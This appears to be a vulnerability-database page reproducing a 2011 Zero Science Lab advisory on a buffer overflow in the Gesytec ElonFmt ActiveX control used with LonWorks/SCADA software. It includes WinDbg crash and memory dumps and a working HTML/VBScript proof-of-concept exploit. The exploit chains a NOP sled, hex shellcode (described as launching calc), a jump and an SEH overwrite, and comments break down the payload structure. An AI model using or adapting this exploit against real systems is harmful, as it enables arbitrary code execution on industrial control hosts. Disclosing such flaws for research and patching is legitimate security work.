Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

🗓️ 21 Apr 2011 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 27 Views

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid buffer overflow vulnerabilit

Code
<!--


Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)


Vendor: Gesytec GmbH
Product web page: http://www.gesytec.de
Affected version: 1.1.14.1

Summary: Connects LonWorks networks to process control, visualization, SCADA
and office software.

Desc: The ElonFmt ActiveX Control Module suffers from a buffer overflow
vulnerability. When a large buffer is sent to the pid item of the GetItem1
function in elonfmt.ocx module, we get a few memory registers overwritten
including the SEH. We're dealing with a character translation. An attacker
can gain access to the system on the affected node and execute arbitrary code.


----------------------------------------------------------------------------------

(fc.1608): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
cccccccc ??              ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc      mov     ebx,0CCBBBBBBh
0013ecf5 cc              int     3
0013ecf6 cc              int     3
0013ecf7 cc              int     3
0013ecf8 dddd            fstp    st(5)
0013ecfa dddd            fstp    st(5)
0013ecfc dddd            fstp    st(5)
0013ecfe dddd            fstp    st(5)

...
...
...

0:000> d esp
0013eb58  01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00  .....aS.|Zc.....
0013eb68  88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf  ........$FS.....
0013eb78  a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89  .Zc..Zc.....`)S.
0013eb88  ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00  ....h...........
0013eb98  06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e  ..........st..C~
0013eba8  01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77  [email protected]
0013ebb8  1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00  .....V..........
0013ebc8  20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00   .c...c....w....
0:000> d
0013ebd8  64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c  d!.w....t..|Q|.|
0013ebe8  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ebf8  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec08  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec18  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec28  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec38  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec48  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................

...
...
...

0:000> d
0013ece8  aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc  ................
0013ecf8  dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01  ..............c.
0013ed08  00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00  ......c.........
0013ed18  82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00  ..........c.(...
0013ed28  00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73  ......c......C.s
0013ed38  5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10  \...............
0013ed48  80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01  ..c.$.V.....x.c.
0013ed58  48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00  H...............



----------------------------------------------------------------------------------


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Easylon OPC Server M 2.30.66.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab - http://www.zeroscience.mk

High five to sickn3ss!


Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php


09.04.2011


JUST A PoC MODEL:


--><html>
<body><object classid="clsid:824C4DC5-8DA4-11D6-A01F-00E098177CDC" id="zsl"></object>
<script language="VBScript">

targetFile = "C:\Easylon\Shared\ElonFmt.ocx"
prototype  = "Function GetItem1 ( ByVal typeName As String ,  ByVal pid As String ,  ByVal selector As Integer ) As Object"
memberName = "GetItem1"
progid     = "ELONFMTLib.ElonFmt"
argCount   = 3

arg1="defaultV"

arg2 = String(10, "90") _
     + "2bc9b88bc18865b132ddc3d97424f45d31450e03" _
     + "450e834ec56a90ac2ee35b4caf94d2a99e8681ba" _
     + "b316c1ee3fdc871acb900f2d7c1e76007daeb6ce" _
     + "bdb04a0c921272dfe753b33d07016c4abab6190e" _
     + "07b6cd0537c068d9cc7a72097cf03cb1f65e9dc0" _
     + "dbbce18b5076910ab1465a3dfd0565f2f054a134" _
     + "eb22d94796341a3a4cb0bf9c0762641dcbf5ef11" _
     + "a072b7353756c341bc5904c0867d80895d1f9177" _
     + "3320c1dfec8489cdf9bfd39bfc326ee2ff4c7144" _
     + "687cfa0bef8129681fc870d88895e059d525df9d" _
     + "e0a5ea5d17b59e5853717210cc147487ed3c1746" _
     + "7edcd8" _
     + String(62, "A") + "eb069090" + "78c70110" _
     + "e9e0fdffff" + String(20, "D")

arg3=1

zsl.GetItem1 arg1 ,arg2 ,arg3



'
'Argument No.2 Structure:
'--------------------------------------------------------------------------------------------------------------
'
' (20)NOPSLED + (446)SCODE(calc) + (62)JUNK + (8)JMP + (8)P/P/R EDI LDRF32R.dll + (10)JMP BCk + (20)JUNK
'
'--------------------------------------------------------------------------------------------------------------
'
'
'
'Scenes (2/5)
'--------------------------------------------------------------------------------------------------------------
'
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + "DDDDDDDD" + "41414141"
'
'           junk             nseh        seh(eip)        pad         eip
'
'--------------------------------------------------------------------------------------------------------------
'
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + String(101, "D")
'
'           junk             nseh        seh(eip)         random
'
'--------------------------------------------------------------------------------------------------------------
'


</script>
</body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Apr 2011 00:00Current
6.3Medium risk
Vulners AI Score6.3
gesytecelonfmtactivexbuffer overflowvulnerabilitysehzero science lab
27